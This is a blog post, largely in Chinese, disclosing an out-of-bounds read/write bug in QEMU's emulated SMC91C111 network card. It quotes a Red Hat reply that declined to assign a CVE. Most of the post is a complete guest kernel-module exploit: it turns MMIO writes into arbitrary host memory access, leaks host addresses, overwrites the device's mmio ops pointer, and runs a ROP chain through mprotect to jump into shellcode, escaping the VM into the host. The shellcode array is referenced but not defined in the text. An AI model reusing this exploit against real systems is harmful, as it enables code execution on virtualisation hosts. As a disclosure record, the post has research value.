A qemu escape - SMC911 exploit

中午整理Macbook硬盘的时候发现了这个半年前看到的然而并没有要来CVE号的漏洞。
嗯、反正也修了半年了，放个exploit……感谢白兔师傅和谢大哥的帮助。纪念那段从来没有挖到过qemu CVE的时光……

Mail

Hello Azure,

On Mon, 24 Oct 2016 09:02:19 GMT, azureyang# wrote:
> I found a OOB read/write bug that can cause code execution on host.
> The relation code is in
> hw/net/smc91c111.c:447
> s->data[n][p] = value;
> hw/net/smc91c111.c:553
> return s->data[n][p];
>
> failed to check the border of the passed value, the packet_num and ptr
> can be set by guest mmio operations. With the overwrite of s->mmio-
> >ops, code execution can be achieved.

Thank you so much for reporting this issue. A patch has been sent upstream to fix this issue.

IIUC, the SMSC91C111 ethernet controller is used on the ARM Versatile EP and other similar platforms. Which are mostly used in the prototype development environments. These platforms are not generally used with KVM to provide virtualised guest environments. We could not consider this issue for a CVE as the upstream Qemu project does not consider these issues to be security relevant.

Please see:
->
http://wiki.qemu.org/SecurityProcess#How_impact_and_severity_of_a_bug_is_decided

Thank you so much!
---
Prasad J Pandit / Red Hat Product Security

exploit

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>

#define SMC911_BASE           (unsigned char *)0xd09a6000

void write_on()
{
    unsigned char * addr = SMC911_BASE;
    addr[14] = 2;
}

void set_addr(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t ptr = offset%0x800;
    addr[2] = offset/0x800;
    addr[6] = ptr&0xff;
    addr[7] = ptr>>8;
}

void set_uint8(uint64_t offset,uint8_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    addr[8] = value;
}

void set_uint16(uint64_t offset,uint16_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint16_t *)&addr[8] = value;
}

void set_uint32(uint64_t offset,uint32_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value;
}

void set_uint64(uint64_t offset,uint64_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value&0xFFFFFFFF;
    set_addr(offset+4);
    *(uint32_t *)&addr[8] = value>>32;
}

void set_memset(uint64_t offset,uint64_t value,uint64_t cbmem)
{
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(offset+i,value);
    }
}

void set_memcpy(uint64_t dst_offset,void * src,uint64_t cbmem)
{
    uint8_t * uc_src = (uint8_t*)src; 
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(dst_offset+i,*(uint64_t *)(uc_src+i));
    }
}

uint8_t get_uint8(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return addr[8];
}

uint16_t get_uint16(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint16_t *)&addr[8];
}

uint32_t get_uint32(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint32_t *)&addr[8];
}

uint64_t get_uint64(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t low = 0,high = 0;
    set_addr(offset);
    low = *(uint32_t *)&addr[8];
    set_addr(offset+4);
    high = *(uint32_t *)&addr[8];
    return (uint64_t)high<<32 | low;
}

//qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic,model=smc91c111 -net user
//mprotect 0x7f11879a2eb0
//libcdata 0x7f1187c65b78
//delta = 0x2c2cc8
//offset = 0x2764
void smc_test(void)
{
    unsigned char * addr = SMC911_BASE;

    uint64_t rop [] = {
        0x00000000006bc31c,//pop rdi; ret;
        0,
        0x000000000052ac4c,//pop rsi; ret;
		0x10000,
		0x0000000000517ea5,//pop rdx; ret;
		0x0000000000000007,//RWE
		0x7f6a14afbeb0,//mprotect
        0x000000000052ac4c,//pop rsi; ret;
		0,
		0x00bc5c1b//jmp rsi;
    };
    uint32_t original_ops = 0, card_base = 0,data_offset=0x2384;
    uint64_t main_arena = 0;
    write_on();
    original_ops = get_uint32(0x43d0-data_offset);
    card_base = get_uint32(0x20b4)-0x4430;

    printk("Host card ops = 0x%0X\ncard base:0x%0X\nfake_mmio_ops:0x%0X\n",original_ops,card_base,card_base+data_offset+0x1800);
    set_memset(0x1800,0,0x80);
    set_uint32(0x1800+1,0x007e29ee);//pop rsi; pop rsp; ret 0x66ff
    set_uint64(0x1800+80,0x6161616162616161);//readb
    set_uint64(0x1800+88,0x6761616168616161);//readw
    set_uint64(0x1800+96,0x6361616164616161);//readl
    set_uint64(0x1800+104,0x696161616a616161);//writeb
    set_uint64(0x1800+112,0x6561616166616161);//writew
    set_uint64(0x1800+120,0x00ba8c41);//writel;push    rdx;call    qword ptr [rbx+1]
    set_uint64(0x1800+0x80,rop[0]+1);
    main_arena = get_uint64(0x2764);
    rop[1] = card_base&0xFFFFFFFFFFFFF000;
    rop[6] = main_arena - 0x2c2cc8;
    rop[8] = card_base+data_offset+0x1888;
    set_memcpy(0x1800+0x66FF+0x88,rop,sizeof(rop));
    set_memcpy(0x1800+0x88,shellcode,sizeof(shellcode));
    set_uint32(0x43d0-data_offset,card_base+data_offset+0x1800);
    *(uint32_t *)&addr[0] = card_base+data_offset+0x1800+0x80;//boom! Can only write low part to rdx because use 32 bit arm,
    //aarch64 can overwrite mmio->ops->valid->max_access_size and mmio->ops->write to achieve extended register control 
    //rsi -> 0-0xf
    //rdx -> 0-0xFFFFFFFF
    //rbx -> controled memory
}

int init_module(void)
{
    smc_test();
    return 0;
}

void cleanup_module(void)
{
}